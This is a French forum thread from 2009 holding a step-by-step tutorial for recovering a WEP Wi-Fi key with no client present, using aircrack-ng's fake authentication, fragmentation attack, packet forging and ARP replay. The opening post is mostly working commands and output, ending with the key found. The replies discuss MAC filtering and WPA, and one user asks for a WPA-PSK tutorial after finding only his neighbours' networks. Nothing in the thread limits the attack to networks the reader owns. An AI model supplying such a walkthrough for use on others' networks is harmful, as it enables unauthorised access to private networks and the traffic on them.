WEP Attaque par fragmentation NO client

Nagual · #1 (**permalink**) 07-23-2009, 09:45 PM

pour commencer un petit rappel des options de aireplay-ng

Code:

root@BT4-Nag:~# aireplay-ng

  Aireplay-ng 1.0 rc3 r1552 - (C) 2006, 2007, 2008, 2009 Thomas d'Otreppe
  Original work: Christophe Devine
  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -g value  : change ring buffer size (default: 8)
      -F        : choose first matching packet

      Fakeauth attack options:

      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec    : seconds between keep-alives
      -y prga   : keystream for shared key auth

      Arp Replay attack options:

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  Source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  Miscellaneous options:

      -R        : disable /dev/rtc usage

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen

No replay interface specified.

on commence par mettre notre carte en mode monitor

Code:

root@BT4-Nag:~# airmon-ng start wlan1

Interface       Chipset         Driver

wlan0           Broadcom        b43 - [phy0]
mon0            Broadcom        b43 - [phy0]
wlan1           RTL8187         rtl8187 - [phy1]
                                (monitor mode enabled on mon1)

on lance un scan général pour trouver du WEP

airodump-ng mon1 --encrypt wep

Code:

CH  7    Elapsed: 48 s    2009-07-23 11:05

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:21:43:00:11:22  -75        5        0    0   7  54   WEP  WEP         dc

une fois que l'on a trouvé notre cible, on ajuste nos paramètres dans airodump

Code:

airodump-ng mon1 --encrypt wep -w dc --bssid 00:21:43:00:11:22 -c 7

on va lancer simultanément une fake authentification

Code:

aireplay-ng --fakeauth 6 -e dc -a 00:21:43:00:11:22 -h 00:C0:CA:00:12:34  mon1   

Waiting for beacon frame (BSSID: 00:21:43:00:11:22) on channel 7

11:07:04  Sending Authentication Request (Open System) [ACK]
11:07:04  Authentication successful
11:07:04  Sending Association Request
11:07:04  Association successful :-) (AID: 1) [ACK]
11:07:10  Sending Authentication Request (Open System)

ainsi que notre attaque par fragmentation (-5)

Code:

aireplay-ng -5 -b 00:21:43:00:11:22 -h 00:C0:CA:00:12:34 mon1

une fois le packet capturé, on va utiliser packetforge pour le forger avec une ip bidon

Code:

packetforge-ng -0 -a 00:21:43:00:11:22 -h 00:C0:CA:00:12:34 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0723-110840.xor -w paket-rep

Une fois notre paquet créé on va le réinjecter

Code:

aireplay-ng -3 -e dc -a 00:21:43:00:11:22 -h 00:C0:CA:00:12:34 -x600 -r paket-rep mon1

On remarque que les datas augmentent dans notre console airodump

Code:

 CH  7    Elapsed: 16 mins    2009-07-23 11:22    fixed channel mon1: 11

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:21:43:00:11:22  -58   9     2197    16317    2   7  54   WEP  WEP    OPN  dc

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:21:43:00:11:22  00:C0:CA:00:12:34    0    0 - 1      0    63295

lorsque l'on a assez de datas on peut lancer aircrack

Code:

root@BT4-Nag:~#aircrack-ng dc-01.cap

    Aircrack-ng 1.0 rc3 r1552


                 |00:03:55| Tested 5684 keys (got 14995 IVs)

   KB    depth   byte(vote)
    0    0/  3   6C(22784) 5E(21504) 77(20992) 0E(19712) 70(19200)
    1    4/  7   4A(19456) 02(18944) 51(18944) 8A(18944) A4(18944)
    2    0/  7   70(20736) 5B(20480) 44(19968) 9F(19712) 8D(19456)
    3    1/  5   B6(20992) 32(20736) E2(19968) 5D(19712) 07(19456)
    4    3/  9   CA(19712) F6(19456) 15(19200) B3(19200) D2(19200)

                         KEY FOUND! | XX:XX:XX:XX:XX |
        Decrypted correctly: 100%

awaxx · #2 (**permalink**) 07-24-2009, 04:26 AM

Bonsoir, tu n'as pas préciser si la borne wifi filtre les adresses MAC.

avec cette commande, on vois bien que le réseau n'est pas filtré (ou alors a déjà été authentifier...)

Code:

aireplay-ng --fakeauth 6 -e dc -a 00:21:43:00:11:22 -h 00:C0:CA:00:12:34  mon1   

Waiting for beacon frame (BSSID: 00:21:43:00:11:22) on channel 7

11:07:04  Sending Authentication Request (Open System) [ACK]
11:07:04  Authentication successful
11:07:04  Sending Association Request
11:07:04  Association successful :-) (AID: 1) [ACK]
11:07:10  Sending Authentication Request (Open System)

si erreur le réseau et filtré, il faut donc capturer du trafic authentifier! pour mener l'attaque a terme

k0nd4h · #3 (**permalink**) 07-27-2009, 08:54 PM

Merci pour le tuto , Mais une question se pose , peut on utiliser ce genre d'attaque en changent d'options avec le types de cryptage WPA ?

netlover666 · #4 (**permalink**) 09-15-2009, 05:01 PM

Merci pour ce tutorial.
j'ai suivi tous ce que ecrit mais le problem qu'aprés que j'ecris cette commande

airodump-ng mon1 --encrypt wep

j' ai attendu a 27min et j'ai rien obtenu il scan toujours!!
qu'elle le problem svp??

yop fr · #5 (**permalink**) 09-15-2009, 07:49 PM

Quote:

Originally Posted by k0nd4h

Merci pour le tuto , Mais une question se pose , peut on utiliser ce genre d'attaque en changent d'options avec le types de cryptage WPA ?

non, pas pour le moment, regarde du coté de tkiptun-ng mais ca ne te permettra pas d'avoir la clé

Nagual · #6 (**permalink**) 09-15-2009, 07:55 PM

Quote:

Originally Posted by netlover666

Merci pour ce tutorial.
j'ai suivi tous ce que ecrit mais le problem qu'aprés que j'ecris cette commande

airodump-ng mon1 --encrypt wep

j' ai attendu a 27min et j'ai rien obtenu il scan toujours!!
qu'elle le problem svp??

Es-tu sur que ton iface est mon1 ?

netlover666 · #7 (**permalink**) 09-15-2009, 09:14 PM

Quote:

Originally Posted by [s3th]

Es-tu sur que ton iface est mon1 ?

j'ai compris le probleme en faite --encrypt wep serve a filterer les connections et puisque tous les voisins utiliseent la wpa-psk donc j'ai rien detecter.. mnt apres enlever --encrypt wep.. j'ai trouvé les connections.
mais mnt le probleme que je peut pas suivre ton tutorial est ce que tu peut faire un autre tutorial pour de WPA-psk attaque??

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode